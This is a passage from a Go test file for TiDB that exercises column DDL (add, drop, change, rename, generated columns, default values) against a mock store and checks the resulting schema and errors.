				err := tk.ExecToErr("insert into t2 values (?, ?, ?)", i, i, i)
				if err != nil {
					// if err is failed, the column number must be 4 now.
					values := tk.MustQuery("show columns from t2").Rows()
					require.Len(t, values, 4)
				}
				tk.MustExec("commit")
			}
			num += step
		}
	}
	// add data, here c4 must exist
	for i := num; i < num+step; i++ {
		tk.MustExec("insert into t2 values (?, ?, ?, ?)", i, i, i, i)
	}
	rows := tk.MustQuery("select count(c4) from t2").Rows()
	require.Len(t, rows, 1)
	require.Len(t, rows[0], 1)
	count, err := strconv.ParseInt(rows[0][0].(string), 10, 64)
	require.NoError(t, err)
	require.Greater(t, count, int64(0))
	tk.MustQuery("select count(c4) from t2 where c4 = -1").Check([][]interface{}{
		{fmt.Sprintf("%v", count-int64(step))},
	})
	for i := num; i < num+step; i++ {
		tk.MustQuery("select c4 from t2 where c4 = ?", i).Check([][]interface{}{
			{fmt.Sprintf("%v", i)},
		})
	}
	tbl := external.GetTableByName(t, tk, "test", "t2")
	// i counts all rows; j counts rows whose c4 kept the backfilled default -1.
	i := 0
	j := 0
	require.NoError(t, sessiontxn.NewTxn(context.Background(), tk.Session()))
	defer func() {
		if txn, err := tk.Session().Txn(true); err == nil {
			require.NoError(t, txn.Rollback())
		}
	}()
	err = tables.IterRecords(tbl, tk.Session(), tbl.Cols(),
		func(_ kv.Handle, data []types.Datum, cols []*table.Column) (bool, error) {
			i++
			// c4 must be -1 or > 0
			v, err := data[3].ToInt64(tk.Session().GetSessionVars().StmtCtx)
			require.NoError(t, err)
			if v == -1 {
				j++
			} else {
				require.Greater(t, v, int64(0))
			}
			return true, nil
		})
	require.NoError(t, err)
	require.Equal(t, int(count), i)
	require.LessOrEqual(t, i, num+step)
	require.Equal(t, int(count)-step, j)
	// for modifying columns after adding columns
	tk.MustExec("alter table t2 modify c4 int default 11")
	for i := num + step; i < num+step+10; i++ {
		tk.MustExec("insert into t2 values (?, ?, ?, ?)", i, i, i, i)
	}
	tk.MustQuery("select count(c4) from t2 where c4 = -1").Check([][]interface{}{
		{fmt.Sprintf("%v", count-int64(step))},
	})
	// add timestamp type column
	tk.MustExec("create table test_on_update_c (c1 int, c2 timestamp);")
	defer tk.MustExec("drop table test_on_update_c;")
	tk.MustExec("alter table test_on_update_c add column c3 timestamp null default '2017-02-11' on update current_timestamp;")
	is := domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_on_update_c"))
	require.NoError(t, err)
	tblInfo := tbl.Meta()
	colC := tblInfo.Columns[2]
	require.Equal(t, mysql.TypeTimestamp, colC.GetType())
	require.False(t, mysql.HasNotNullFlag(colC.GetFlag()))
	// add datetime type column
	tk.MustExec("create table test_on_update_d (c1 int, c2 datetime);")
	tk.MustExec("alter table test_on_update_d add column c3 datetime on update current_timestamp;")
	is = domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_on_update_d"))
	require.NoError(t, err)
	tblInfo = tbl.Meta()
	colC = tblInfo.Columns[2]
	require.Equal(t, mysql.TypeDatetime, colC.GetType())
	require.False(t, mysql.HasNotNullFlag(colC.GetFlag()))
	// add year type column
	tk.MustExec("create table test_on_update_e (c1 int);")
	defer tk.MustExec("drop table test_on_update_e;")
	tk.MustExec("insert into test_on_update_e (c1) values (0);")
	tk.MustExec("alter table test_on_update_e add column c2 year not null;")
	tk.MustQuery("select c2 from test_on_update_e").Check(testkit.Rows("0"))
	// test add unsupported constraint
	tk.MustExec("create table t_add_unsupported_constraint (a int);")
	err = tk.ExecToErr("ALTER TABLE t_add_unsupported_constraint ADD id int AUTO_INCREMENT;")
	require.EqualError(t, err, "[ddl:8200]unsupported add column 'id' constraint AUTO_INCREMENT when altering 'test.t_add_unsupported_constraint'")
	err = tk.ExecToErr("ALTER TABLE t_add_unsupported_constraint ADD id int KEY;")
	require.EqualError(t, err, "[ddl:8200]unsupported add column 'id' constraint PRIMARY KEY when altering 'test.t_add_unsupported_constraint'")
	err = tk.ExecToErr("ALTER TABLE t_add_unsupported_constraint ADD id int UNIQUE;")
	require.EqualError(t, err, "[ddl:8200]unsupported add column 'id' constraint UNIQUE KEY when altering 'test.t_add_unsupported_constraint'")
	// ===========
	// DROP COLUMN
	// ===========
	done = make(chan error, 1)
	tk.MustExec("delete from t2")
	num = 100
	// add some rows
	for i := 0; i < num; i++ {
		tk.MustExec("insert into t2 values (?, ?, ?, ?)", i, i, i, i)
	}
	// get c4 column id
	testddlutil.SessionExecInGoroutine(store, "test", "alter table t2 drop column c4", done)
	ticker = time.NewTicker(columnModifyLease / 2)
	defer ticker.Stop()
	step = 10
DropLoop:
	for {
		select {
		case err := <-done:
			if err == nil {
				break DropLoop
			}
			require.NoError(t, err)
		case <-ticker.C:
			// delete some rows, and add some data
			for i := num; i < num+step; i++ {
				// Make sure that statement of insert and show use the same infoSchema.
				tk.MustExec("begin")
				err := tk.ExecToErr("insert into t2 values (?, ?, ?)", i, i, i)
				if err != nil {
					// If executing is failed, the column number must be 4 now.
					values := tk.MustQuery("show columns from t2").Rows()
					require.Len(t, values, 4)
				}
				tk.MustExec("commit")
			}
			num += step
		}
	}
	// add data, here c4 must not exist
	for i := num; i < num+step; i++ {
		tk.MustExec("insert into t2 values (?, ?, ?)", i, i, i)
	}
	rows = tk.MustQuery("select count(*) from t2").Rows()
	require.Len(t, rows, 1)
	require.Len(t, rows[0], 1)
	count, err = strconv.ParseInt(rows[0][0].(string), 10, 64)
	require.NoError(t, err)
	require.Greater(t, count, int64(0))
}
// TestDropColumn is for inserting value with a to-be-dropped column when do drop column.
// Column info from schema in build-insert-plan should be public only,
// otherwise they will not be consisted with Table.Col(), then the server will panic.
func TestDropColumn(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	num := 25
	multiDDL := make([]string, 0, num)
	sql := "create table t2 (c1 int, c2 int, c3 int, "
	// Build one DROP COLUMN statement per extra column c4..c(3+num) while
	// assembling the matching CREATE TABLE statement.
	for i := 4; i < 4+num; i++ {
		multiDDL = append(multiDDL, fmt.Sprintf("alter table t2 drop column c%d", i))
		if i != 3+num {
			sql += fmt.Sprintf("c%d int, ", i)
		} else {
			sql += fmt.Sprintf("c%d int)", i)
		}
	}
	tk.MustExec(sql)
	dmlDone := make(chan error, num)
	ddlDone := make(chan error, num)
	testddlutil.ExecMultiSQLInGoroutine(store, "test", multiDDL, ddlDone)
	for i := 0; i < num; i++ {
		testddlutil.ExecMultiSQLInGoroutine(store, "test", []string{"insert into t2 set c1 = 1, c2 = 1, c3 = 1, c4 = 1"}, dmlDone)
	}
	// Only DDL results are checked; DML errors are expected while columns are
	// being dropped, so dmlDone is intentionally left unread.
	for i := 0; i < num; i++ {
		err := <-ddlDone
		require.NoError(t, err)
	}
	// Test for drop partition table column.
	tk.MustExec("drop table if exists t1")
	tk.MustExec("create table t1 (a int,b int) partition by hash(a) partitions 4;")
	err := tk.ExecToErr("alter table t1 drop column a")
	require.EqualError(t, err, "[ddl:3855]Column 'a' has a partitioning function dependency and cannot be dropped or renamed")
}
// TestChangeColumn covers ALTER TABLE ... CHANGE/MODIFY: renames, the
// no-default flag, comments, timestamp and enum columns, prefix-index
// interactions, and the expected error cases.
func TestChangeColumn(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease, mockstore.WithDDLChecker())
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	tk.MustExec("create table t3 (a int default '0', b varchar(10), d int not null default '0')")
	tk.MustExec("insert into t3 set b = 'a'")
	tk.MustQuery("select a from t3").Check(testkit.Rows("0"))
	tk.MustExec("alter table t3 change a aa bigint")
	tk.MustExec("insert into t3 set b = 'b'")
	tk.MustQuery("select aa from t3").Check(testkit.Rows("0", "<nil>"))
	// for no default flag
	tk.MustExec("alter table t3 change d dd bigint not null")
	is := domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("t3"))
	require.NoError(t, err)
	tblInfo := tbl.Meta()
	colD := tblInfo.Columns[2]
	require.True(t, mysql.HasNoDefaultValueFlag(colD.GetFlag()))
	// for the following definitions: 'not null', 'null', 'default value' and 'comment'
	tk.MustExec("alter table t3 change b b varchar(20) null default 'c' comment 'my comment'")
	is = domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("t3"))
	require.NoError(t, err)
	tblInfo = tbl.Meta()
	colB := tblInfo.Columns[1]
	require.Equal(t, "my comment", colB.Comment)
	require.False(t, mysql.HasNotNullFlag(colB.GetFlag()))
	tk.MustExec("insert into t3 set aa = 3, dd = 5")
	tk.MustQuery("select b from t3").Check(testkit.Rows("a", "b", "c"))
	// for timestamp
	tk.MustExec("alter table t3 add column c timestamp not null")
	tk.MustExec("alter table t3 change c c timestamp null default '2017-02-11' comment 'col c comment' on update current_timestamp")
	is = domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("t3"))
	require.NoError(t, err)
	tblInfo = tbl.Meta()
	colC := tblInfo.Columns[3]
	require.Equal(t, "col c comment", colC.Comment)
	require.False(t, mysql.HasNotNullFlag(colC.GetFlag()))
	// for enum
	tk.MustExec("alter table t3 add column en enum('a', 'b', 'c') not null default 'a'")
	// https://github.com/pingcap/tidb/issues/23488
	// if there is a prefix index on the varchar column, then we can change it to text
	tk.MustExec("drop table if exists t")
	tk.MustExec("create table t (k char(10), v int, INDEX(k(7)));")
	tk.MustExec("alter table t change column k k tinytext")
	is = domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("t"))
	require.NoError(t, err)
	// for failing tests
	sql := "alter table t3 change aa a bigint default ''"
	tk.MustGetErrCode(sql, errno.ErrInvalidDefault)
	sql = "alter table t3 change a testx.t3.aa bigint"
	tk.MustGetErrCode(sql, errno.ErrWrongDBName)
	sql = "alter table t3 change t.a aa bigint"
	tk.MustGetErrCode(sql, errno.ErrWrongTableName)
	tk.MustExec("create table t4 (c1 int, c2 int, c3 int default 1, index (c1));")
	tk.MustExec("insert into t4(c2) values (null);")
	err = tk.ExecToErr("alter table t4 change c1 a1 int not null;")
	require.EqualError(t, err, "[ddl:1265]Data truncated for column 'a1' at row 1")
	sql = "alter table t4 change c2 a bigint not null;"
	tk.MustGetErrCode(sql, mysql.WarnDataTruncated)
	sql = "alter table t3 modify en enum('a', 'z', 'b', 'c') not null default 'a'"
	tk.MustExec(sql)
	// Rename to an existing column.
	tk.MustExec("alter table t3 add column a bigint")
	sql = "alter table t3 change aa a bigint"
	tk.MustGetErrCode(sql, errno.ErrDupFieldName)
	// https://github.com/pingcap/tidb/issues/23488
	tk.MustExec("drop table if exists t5")
	tk.MustExec("create table t5 (k char(10) primary key, v int)")
	sql = "alter table t5 change column k k tinytext;"
	tk.MustGetErrCode(sql, mysql.ErrBlobKeyWithoutLength)
	tk.MustExec("drop table t5")
	tk.MustExec("drop table if exists t5")
	tk.MustExec("create table t5 (k char(10), v int, INDEX(k))")
	sql = "alter table t5 change column k k tinytext;"
	tk.MustGetErrCode(sql, mysql.ErrBlobKeyWithoutLength)
	tk.MustExec("drop table t5")
	tk.MustExec("drop table t3")
}
// TestRenameColumn covers ALTER TABLE ... RENAME COLUMN: no-op renames,
// missing/duplicate targets, generated-column dependencies, and views that
// become invalid after a rename.
func TestRenameColumn(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease, mockstore.WithDDLChecker())
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	// assertColNames checks the table's column names, in order.
	assertColNames := func(tableName string, colNames ...string) {
		cols := external.GetTableByName(t, tk, "test", tableName).Cols()
		require.Equal(t, len(colNames), len(cols))
		for i := range cols {
			require.Equal(t, strings.ToLower(colNames[i]), cols[i].Name.L)
		}
	}
	tk.MustExec("create table test_rename_column (id int not null primary key auto_increment, col1 int)")
	tk.MustExec("alter table test_rename_column rename column col1 to col1")
	assertColNames("test_rename_column", "id", "col1")
	tk.MustExec("alter table test_rename_column rename column col1 to col2")
	assertColNames("test_rename_column", "id", "col2")
	// Test renaming non-exist columns.
	tk.MustGetErrCode("alter table test_rename_column rename column non_exist_col to col3", errno.ErrBadField)
	// Test renaming to an exist column.
	tk.MustGetErrCode("alter table test_rename_column rename column col2 to id", errno.ErrDupFieldName)
	// Test renaming generated columns.
	tk.MustExec("drop table test_rename_column")
	tk.MustExec("create table test_rename_column (id int, col1 int generated always as (id + 1))")
	tk.MustExec("alter table test_rename_column rename column col1 to col2")
	assertColNames("test_rename_column", "id", "col2")
	tk.MustExec("alter table test_rename_column rename column col2 to col1")
	assertColNames("test_rename_column", "id", "col1")
	tk.MustGetErrCode("alter table test_rename_column rename column id to id1", errno.ErrDependentByGeneratedColumn)
	// Test renaming view columns.
	tk.MustExec("drop table test_rename_column")
	tk.MustExec("create table test_rename_column (id int, col1 int)")
	tk.MustExec("create view test_rename_column_view as select * from test_rename_column")
	tk.MustExec("alter table test_rename_column rename column col1 to col2")
	tk.MustGetErrCode("select * from test_rename_column_view", errno.ErrViewInvalid)
	tk.MustExec("drop view test_rename_column_view")
	tk.MustExec("drop table test_rename_column")
	// Test rename a non-exists column. See https://github.com/pingcap/tidb/issues/34811.
	tk.MustExec("drop table if exists t;")
	tk.MustExec("create table t (a int);")
	tk.MustGetErrCode("alter table t rename column b to b;", errno.ErrBadField)
}
// TestVirtualColumnDDL checks generated (virtual and stored) columns on
// global and local temporary tables: column metadata, DESC output, and
// inserts using DEFAULT for the generated values.
func TestVirtualColumnDDL(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	tk.MustExec(`create global temporary table test_gv_ddl(a int, b int as (a+8) virtual, c int as (b + 2) stored) on commit delete rows;`)
	is := sessiontxn.GetTxnManager(tk.Session()).GetTxnInfoSchema()
	tbl, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_gv_ddl"))
	require.NoError(t, err)
	// Expected generated-expression metadata for columns a, b, c in order.
	testCases := []struct {
		generatedExprString string
		generatedStored     bool
	}{
		{"", false},
		{"`a` + 8", false},
		{"`b` + 2", true},
	}
	for i, column := range tbl.Meta().Columns {
		require.Equal(t, testCases[i].generatedExprString, column.GeneratedExprString)
		require.Equal(t, testCases[i].generatedStored, column.GeneratedStored)
	}
	result := tk.MustQuery(`DESC test_gv_ddl`)
	result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
	tk.MustExec("begin;")
	tk.MustExec("insert into test_gv_ddl values (1, default, default)")
	tk.MustQuery("select * from test_gv_ddl").Check(testkit.Rows("1 9 11"))
	tk.MustExec("commit")
	// for local temporary table
	tk.MustExec(`create temporary table test_local_gv_ddl(a int, b int as (a+8) virtual, c int as (b + 2) stored);`)
	is = sessiontxn.GetTxnManager(tk.Session()).GetTxnInfoSchema()
	tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_local_gv_ddl"))
	require.NoError(t, err)
	for i, column := range tbl.Meta().Columns {
		require.Equal(t, testCases[i].generatedExprString, column.GeneratedExprString)
		require.Equal(t, testCases[i].generatedStored, column.GeneratedStored)
	}
	result = tk.MustQuery(`DESC test_local_gv_ddl`)
	result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
	tk.MustExec("begin;")
	tk.MustExec("insert into test_local_gv_ddl values (1, default, default)")
	tk.MustQuery("select * from test_local_gv_ddl").Check(testkit.Rows("1 9 11"))
	tk.MustExec("commit")
	tk.MustQuery("select * from test_local_gv_ddl").Check(testkit.Rows("1 9 11"))
}
func TestGeneratedColumnDDL(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
// Check create table with virtual and stored generated columns.
tk.MustExec(`CREATE TABLE test_gv_ddl(a int, b int as (a+8) virtual, c int as (b + 2) stored)`)
// Check desc table with virtual and stored generated columns.
result := tk.MustQuery(`DESC test_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
// Check show create table with virtual and stored generated columns.
result = tk.MustQuery(`show create table test_gv_ddl`)
result.Check(testkit.Rows(
"test_gv_ddl CREATE TABLE `test_gv_ddl` (\n `a` int(11) DEFAULT NULL,\n `b` int(11) GENERATED ALWAYS AS (`a` + 8) VIRTUAL,\n `c` int(11) GENERATED ALWAYS AS (`b` + 2) STORED\n) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
))
// Check generated expression with blanks.
tk.MustExec("create table table_with_gen_col_blanks (a int, b char(20) as (cast( \r\n\t a \r\n\tas char)), c int as (a+100))")
result = tk.MustQuery(`show create table table_with_gen_col_blanks`)
result.Check(testkit.Rows("table_with_gen_col_blanks CREATE TABLE `table_with_gen_col_blanks` (\n" +
" `a` int(11) DEFAULT NULL,\n" +
" `b` char(20) GENERATED ALWAYS AS (cast(`a` as char)) VIRTUAL,\n" +
" `c` int(11) GENERATED ALWAYS AS (`a` + 100) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
// Check generated expression with charset latin1 ("latin1" != mysql.DefaultCharset).
tk.MustExec("create table table_with_gen_col_latin1 (a int, b char(20) as (cast( \r\n\t a \r\n\tas char charset latin1)), c int as (a+100))")
result = tk.MustQuery(`show create table table_with_gen_col_latin1`)
result.Check(testkit.Rows("table_with_gen_col_latin1 CREATE TABLE `table_with_gen_col_latin1` (\n" +
" `a` int(11) DEFAULT NULL,\n" +
" `b` char(20) GENERATED ALWAYS AS (cast(`a` as char charset latin1)) VIRTUAL,\n" +
" `c` int(11) GENERATED ALWAYS AS (`a` + 100) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
// Check generated expression with string (issue 9457).
tk.MustExec("create table table_with_gen_col_string (first_name varchar(10), last_name varchar(10), full_name varchar(255) AS (CONCAT(first_name,' ',last_name)))")
result = tk.MustQuery(`show create table table_with_gen_col_string`)
result.Check(testkit.Rows("table_with_gen_col_string CREATE TABLE `table_with_gen_col_string` (\n" +
" `first_name` varchar(10) DEFAULT NULL,\n" +
" `last_name` varchar(10) DEFAULT NULL,\n" +
" `full_name` varchar(255) GENERATED ALWAYS AS (concat(`first_name`, _utf8mb4' ', `last_name`)) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
tk.MustExec("alter table table_with_gen_col_string modify column full_name varchar(255) GENERATED ALWAYS AS (CONCAT(last_name,' ' ,first_name) ) VIRTUAL")
result = tk.MustQuery(`show create table table_with_gen_col_string`)
result.Check(testkit.Rows("table_with_gen_col_string CREATE TABLE `table_with_gen_col_string` (\n" +
" `first_name` varchar(10) DEFAULT NULL,\n" +
" `last_name` varchar(10) DEFAULT NULL,\n" +
" `full_name` varchar(255) GENERATED ALWAYS AS (concat(`last_name`, _utf8mb4' ', `first_name`)) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
// Test incorrect parameter count.
tk.MustGetErrCode("create table test_gv_incorrect_pc(a double, b int as (lower(a, 2)))", errno.ErrWrongParamcountToNativeFct)
tk.MustGetErrCode("create table test_gv_incorrect_pc(a double, b int as (lower(a, 2)) stored)", errno.ErrWrongParamcountToNativeFct)
genExprTests := []struct {
stmt string
err int
}{
// Drop/rename columns dependent by other column.
{`alter table test_gv_ddl drop column a`, errno.ErrDependentByGeneratedColumn},
{`alter table test_gv_ddl change column a anew int`, errno.ErrDependentByGeneratedColumn},
// Modify/change stored status of generated columns.
{`alter table test_gv_ddl modify column b bigint`, errno.ErrUnsupportedOnGeneratedColumn},
{`alter table test_gv_ddl change column c cnew bigint as (a+100)`, errno.ErrUnsupportedOnGeneratedColumn},
// Modify/change generated columns breaking prior.
{`alter table test_gv_ddl modify column b int as (c+100)`, errno.ErrGeneratedColumnNonPrior},
{`alter table test_gv_ddl change column b bnew int as (c+100)`, errno.ErrDependentByGeneratedColumn},
// Refer not exist columns in generation expression.
{`create table test_gv_ddl_bad (a int, b int as (c+8))`, errno.ErrBadField},
// Refer generated columns non prior.
{`create table test_gv_ddl_bad (a int, b int as (c+1), c int as (a+1))`, errno.ErrGeneratedColumnNonPrior},
// Virtual generated columns cannot be primary key.
{`create table test_gv_ddl_bad (a int, b int, c int as (a+b) primary key)`, errno.ErrUnsupportedOnGeneratedColumn},
{`create table test_gv_ddl_bad (a int, b int, c int as (a+b), primary key(c))`, errno.ErrUnsupportedOnGeneratedColumn},
{`create table test_gv_ddl_bad (a int, b int, c int as (a+b), primary key(a, c))`, errno.ErrUnsupportedOnGeneratedColumn},
// Add stored generated column through alter table.
{`alter table test_gv_ddl add column d int as (b+2) stored`, errno.ErrUnsupportedOnGeneratedColumn},
{`alter table test_gv_ddl modify column b int as (a + 8) stored`, errno.ErrUnsupportedOnGeneratedColumn},
// Add generated column with incorrect parameter count.
{`alter table test_gv_ddl add column z int as (lower(a, 2))`, errno.ErrWrongParamcountToNativeFct},
{`alter table test_gv_ddl add column z int as (lower(a, 2)) stored`, errno.ErrWrongParamcountToNativeFct},
// Modify generated column with incorrect parameter count.
{`alter table test_gv_ddl modify column b int as (lower(a, 2))`, errno.ErrWrongParamcountToNativeFct},
{`alter table test_gv_ddl change column b b int as (lower(a, 2))`, errno.ErrWrongParamcountToNativeFct},
}
for _, tt := range genExprTests {
tk.MustGetErrCode(tt.stmt, tt.err)
}
// Check alter table modify/change generated column.
modStoredColErrMsg := "[ddl:3106]'modifying a stored column' is not supported for generated columns."
tk.MustGetErrMsg(`alter table test_gv_ddl modify column c bigint as (b+200) stored`, modStoredColErrMsg)
result = tk.MustQuery(`DESC test_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
// According to https://github.com/pingcap/tidb/issues/24321, this test case is not supported.
// Although in MySQL this is a legal one.
// tk.MustExec(`alter table test_gv_ddl change column b b bigint as (a+100) virtual`)
// result = tk.MustQuery(`DESC test_gv_ddl`)
// result.Check(testkit.Rows(`a int(11) YES <nil> `, `b bigint(20) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
tk.MustExec(`alter table test_gv_ddl change column c cnew bigint`)
result = tk.MustQuery(`DESC test_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `cnew bigint(20) YES <nil> `))
// Test generated column `\\`.
tk.MustExec("drop table if exists t")
tk.MustExec("CREATE TABLE t(c0 TEXT AS ('\\\\'));")
tk.MustExec("insert into t values ()")
tk.MustQuery("select * from t").Check(testkit.Rows("\\"))
tk.MustExec("drop table if exists t")
tk.MustExec("CREATE TABLE t(c0 TEXT AS ('a\\\\b\\\\c\\\\'))")
tk.MustExec("insert into t values ()")
tk.MustQuery("select * from t").Check(testkit.Rows("a\\b\\c\\"))
}
// TestColumnModifyingDefinition exercises `ALTER TABLE ... CHANGE` on a
// nullable column: the change to NOT NULL succeeds on an empty column and
// applies the NOT NULL flag, but is rejected once a NULL row exists.
func TestColumnModifyingDefinition(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	tk.MustExec("create table test2 (c1 int, c2 int, c3 int default 1, index (c1));")
	tk.MustExec("alter table test2 change c2 a int not null;")

	// The renamed column must carry the NOT NULL flag in the info schema.
	infoSchema := domain.GetDomain(tk.Session()).InfoSchema()
	tbl, err := infoSchema.TableByName(model.NewCIStr("test"), model.NewCIStr("test2"))
	require.NoError(t, err)
	var renamed *table.Column
	for _, col := range tbl.Cols() {
		if col.Name.L != "a" {
			continue
		}
		renamed = col
	}
	require.True(t, mysql.HasNotNullFlag(renamed.GetFlag()))

	// With an existing NULL row the same change must now fail.
	tk.MustExec("drop table if exists test2;")
	tk.MustExec("create table test2 (c1 int, c2 int, c3 int default 1, index (c1));")
	tk.MustExec("insert into test2(c2) values (null);")
	tk.MustGetErrMsg("alter table test2 change c2 a int not null", "[ddl:1265]Data truncated for column 'a' at row 1")
	tk.MustGetErrCode("alter table test2 change c1 a1 bigint not null;", mysql.WarnDataTruncated)
}
// TestColumnModifyingDefaultValue verifies that a fractional DEFAULT given to
// an int column is rounded when the definition is changed, while a quoted
// numeric default on a float column is parsed and normalized.
func TestColumnModifyingDefaultValue(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")

	// mustHaveDefault asserts that `show create table t` contains the
	// expected column-definition fragment.
	mustHaveDefault := func(want string) {
		row := tk.MustQuery("show create table t").Rows()[0][1]
		require.True(t, strings.Contains(row.(string), want))
	}

	tk.MustExec("create table t (a int default 1);")
	tk.MustExec("alter table t change a a int default 0.00;")
	mustHaveDefault("`a` int(11) DEFAULT '0'")

	tk.MustExec("drop table if exists t;")
	tk.MustExec("create table t (a int default 1.25);")
	tk.MustExec("alter table t change a a int default 2.8;")
	mustHaveDefault("`a` int(11) DEFAULT '3'")

	tk.MustExec("drop table if exists t;")
	tk.MustExec("create table t (a float default 1.25);")
	tk.MustExec("alter table t change a a float default '0012.32';")
	mustHaveDefault("`a` float DEFAULT '12.32'")
}
// TestTransactionWithWriteOnlyColumn runs a full transaction against a table
// while an ALTER TABLE on the same table is in the StateWriteOnly schema
// state, covering both an add-column and a drop-column job.
func TestTransactionWithWriteOnlyColumn(t *testing.T) {
	store, dom := testkit.CreateMockStoreAndDomainWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	tk.MustExec("drop table if exists t1")
	tk.MustExec("create table t1 (a int key);")
	// Statement batches executed as transactions from inside the DDL hook.
	transactions := [][]string{
		{
			"begin",
			"insert into t1 set a=1",
			"update t1 set a=2 where a=1",
			"commit",
		},
	}
	hook := &callback.TestDDLCallback{Do: dom}
	var checkErr error
	hook.OnJobRunBeforeExported = func(job *model.Job) {
		// Only the first failure is recorded.
		if checkErr != nil {
			return
		}
		// Act only while the new/old column is write-only.
		switch job.SchemaState {
		case model.StateWriteOnly:
		default:
			return
		}
		// do transaction.
		for _, transaction := range transactions {
			for _, sql := range transaction {
				if _, checkErr = tk.Exec(sql); checkErr != nil {
					// Wrap the failure with the statement and schema state
					// so the assertion below reports useful context.
					checkErr = errors.Errorf("err: %s, sql: %s, job schema state: %s", checkErr.Error(), sql, job.SchemaState)
					return
				}
			}
		}
	}
	dom.DDL().SetHook(hook)
	done := make(chan error, 1)
	// test transaction on add column.
	go backgroundExec(store, "test", "alter table t1 add column c int not null", done)
	err := <-done
	require.NoError(t, err)
	require.NoError(t, checkErr)
	// The hook's transaction inserted a=1 then updated it to 2.
	tk.MustQuery("select a from t1").Check(testkit.Rows("2"))
	tk.MustExec("delete from t1")
	// test transaction on drop column.
	go backgroundExec(store, "test", "alter table t1 drop column c", done)
	err = <-done
	require.NoError(t, err)
	require.NoError(t, checkErr)
	tk.MustQuery("select a from t1").Check(testkit.Rows("2"))
}
// TestModifyGeneratedColumn covers ALTER TABLE MODIFY/CHANGE on generated
// columns: rejected while the column is indexed or stored and the expression
// changes, allowed when only the type changes (expression identical modulo
// whitespace), plus the non-generated <-> stored-generated transitions.
func TestModifyGeneratedColumn(t *testing.T) {
	store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
	tk := testkit.NewTestKit(t, store)
	tk.MustExec("use test")
	modIdxColErrMsg := "[ddl:3106]'modifying an indexed column' is not supported for generated columns."
	modStoredColErrMsg := "[ddl:3106]'modifying a stored column' is not supported for generated columns."
	// Modify column with single-col-index.
	tk.MustExec("drop table if exists t1;")
	tk.MustExec("create table t1 (a int, b int as (a+1), index idx(b));")
	tk.MustExec("insert into t1 set a=1;")
	tk.MustGetErrMsg("alter table t1 modify column b int as (a+2);", modIdxColErrMsg)
	// Once the index is dropped, changing the expression is allowed.
	tk.MustExec("drop index idx on t1;")
	tk.MustExec("alter table t1 modify b int as (a+2);")
	tk.MustQuery("select * from t1").Check(testkit.Rows("1 3"))
	// Modify column with multi-col-index.
	tk.MustExec("drop table t1;")
	tk.MustExec("create table t1 (a int, b int as (a+1), index idx(a, b));")
	tk.MustExec("insert into t1 set a=1;")
	tk.MustGetErrMsg("alter table t1 modify column b int as (a+2);", modIdxColErrMsg)
	tk.MustExec("drop index idx on t1;")
	tk.MustExec("alter table t1 modify b int as (a+2);")
	tk.MustQuery("select * from t1").Check(testkit.Rows("1 3"))
	// Modify column with stored status to a different expression.
	tk.MustExec("drop table t1;")
	tk.MustExec("create table t1 (a int, b int as (a+1) stored);")
	tk.MustExec("insert into t1 set a=1;")
	tk.MustGetErrMsg("alter table t1 modify column b int as (a+2) stored;", modStoredColErrMsg)
	// Modify column with stored status to the same expression.
	// Note: "(a+1)" and "(a + 1)" are both accepted as the same expression.
	tk.MustExec("drop table t1;")
	tk.MustExec("create table t1 (a int, b int as (a+1) stored);")
	tk.MustExec("insert into t1 set a=1;")
